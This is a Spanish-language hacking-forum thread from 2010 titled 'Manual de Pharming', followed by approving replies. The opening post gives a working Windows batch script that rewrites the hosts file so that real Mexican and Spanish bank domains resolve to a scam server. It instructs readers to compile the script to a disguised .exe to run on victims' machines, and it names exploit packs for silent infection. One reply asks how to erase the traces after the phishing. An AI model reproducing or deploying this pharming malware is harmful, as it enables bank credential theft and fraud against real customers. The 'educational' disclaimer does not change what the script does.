comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Manual de Pharming

  • 5 Respuestas
  • 4036 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5411
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 18, 2010, 12:49:22 pm »
Manual de Pharming

Bueno, primero que todo necesitaremos saber que es pharming si lo queres poner en practica: aqui les va un poco de definicion.


Ahora que ya sabemos que es pharming y pues phising procederemos a actuar:

Materiales:
El block de notas
Algun pack de iconos
Converter .bat to .exe (es un compilador de archivos batch)

Ahora lo primero que vamos hacer sera abrir el block de notas y escribir:

Código: [Seleccionar]
@echo off
echo 72.9.233.146 www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 www.esmas.com >> %windir%\system32\drivers\etc\hosts
exit

Expliquemos un poco,: la direccion ip

Código: [Seleccionar]
72.9.233.146
sera la ip de su hosting donde tengan su scam bancario o de lo que sea(con ip de su hosting me refiero a un hosting con ip dedicada no que hicieron ping a su pagina web y listo ye tengo mi ip por que eso no es asi), entonces esa ip la cambian por la suya, en este caso puse la ip de la pagina web de un juego.
La pagina web que en este caso pusimos
Código: [Seleccionar]
www.banamex.com.mx - www.bbva.com - www.bancomer.com.mx - www.esmas.comseran las paginas webs a las que entraran nuestras victimas y seran redireccionadas a nuestro scam.
Y la ruta
Código: [Seleccionar]
%windir%\system32\drivers\etc\hostslo que hace es llamar al archivo hosts que se encuentra en el directorio de
Código: [Seleccionar]
windows > system32 > drivers > etc
para asi añadirle esas lineas nuestras al archivo hosts.

Ya dejemonos de explicaciones y vamos al grano: Ahora le damos clic en guardar como y le ponen cualquier nombre pero con la extencion .bat por ejemplo (file.bat) y nos salimos ahora abrimos nuestro converter .bat to .exe y compilamos nuestro archivo para que quede en .exe y si quieren le cambian el icono desde el mismo compilador y con esto abremos terminado, ahora provemos: ejecutemos nuestro archivo file.exe y veran que no paso nada a simple vista pero ahora vayan a la siguiente ruta WINDOWS\system32\drivers\etc y abran el archivo hosts con el block de notas y veran nuestras URL`S e IP`S en aquel archivo y eso significara que funciono (cuando ejecuten su archivo file.exe se modificara el archivo hosts, y para desinfectarse solo abran el archivo hosts y borren nuestras URL`S e IP`S que se añadieron y dejamos por defecto la ip 127.0.0.1 y el nombre localhost) o simplemente abran una ventana nueva del internet y escriban una de las direcciones webs que decian en el archivo como por ejemplo www.bbva.com y veran que seran redireccionados a la ip (72.9.233.146) la cual es una pagina web de un juego, y si miran bien la URL se daran cuenta de que nada cambia por que dira lo mismo de www.bbva.com por eso es tan efectivo estos ataques jeje, y para los que piensan en grande por la net existen varios scripts para infectar PC`S de forma silenciosa como el fire pack lite, ice pack entre otros.

Nota:Este documento fue creado de forma educativa y ni el autor ni ayudantes se hacen responsables por los malos usos que les puedan dar a este documento.

Todos Los Derechos Reservados.TheFidentisEste Documento puede ser distribuido, siempre y cuando el nombre del autor permanezca intacto.

Autor: TheFidentis
Fuente: hackxcrack.es


Desconectado deleted

  • *
  • Underc0der
  • Mensajes: 136
  • Actividad:
    0%
  • Reputación 0
  • El Credo del Asesino
    • Ver Perfil
    • Email
« Respuesta #1 en: Mayo 14, 2010, 09:32:58 pm »
Hay alguna manera que automaticamente despues de hacer el phishing se borre la entrada en host porque si no no podria logearse en la pagina de verdad
HAPPY HACKING

Desconectado ||•?¤?- SeCurity-?¤?•||

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 15, 2010, 12:55:02 am »
buen tuto anthrax haver cuando te ayudo en moderacion claro si se puede !! nos bemos buen dia

Desconectado syskc0

  • *
  • Underc0der
  • Mensajes: 39
  • Actividad:
    0%
  • Reputación 0
  • Hello Word !!
    • Ver Perfil
    • Email
« Respuesta #3 en: Mayo 15, 2010, 09:56:43 am »
viejo tutorial todavia me acuerdo cuando lo ley claro  pensando que se podria utilizar un servidor local en la pc esta y haci no sospeche es como un eframe a el sitio verdadero algo como spyware en la pc..

respondo claro que tu puedes modificar esto para que solo se logee determinado tiempo se me olvido ms-dos  ::)

el mundo es una variable facil inicias facil terminas

=_=

Desconectado Harakiri

  • *
  • Underc0der
  • Mensajes: 92
  • Actividad:
    0%
  • Reputación 0
  • ~Lets hack like its 1998!
    • Ver Perfil
    • Email
« Respuesta #4 en: Junio 28, 2010, 12:52:31 pm »
Muy buen material! se agradece!


303010

  • *
  • Visitante
« Respuesta #5 en: Junio 28, 2010, 01:13:46 pm »
Buen tuto, nos sera util para muchos. Grax ANTRAx

 

¿Te gustó el post? COMPARTILO!



[Manual] Cambiar extensió de cualquier archivo - Ocultación de ejecutables

Iniciado por LucaSthefano

Respuestas: 4
Vistas: 2545
Último mensaje Julio 25, 2011, 04:30:35 am
por LucaSthefano
Manual para crear un CD Autoejecutable [Autoruns]

Iniciado por Stiuvert

Respuestas: 2
Vistas: 1999
Último mensaje Agosto 16, 2011, 08:17:03 pm
por Snifer
Manual Basico Cheat Engine.

Iniciado por Cl0udswX

Respuestas: 0
Vistas: 1841
Último mensaje Abril 06, 2013, 09:57:03 pm
por Cl0udswX
Manual Secreto de Anonymous

Iniciado por Aryenal.Bt

Respuestas: 1
Vistas: 2265
Último mensaje Mayo 03, 2012, 11:15:50 pm
por urvreak
..::[Manual Basico Metasploit]::..

Iniciado por RooT_Shell

Respuestas: 5
Vistas: 3453
Último mensaje Mayo 11, 2015, 02:45:59 am
por Baxtar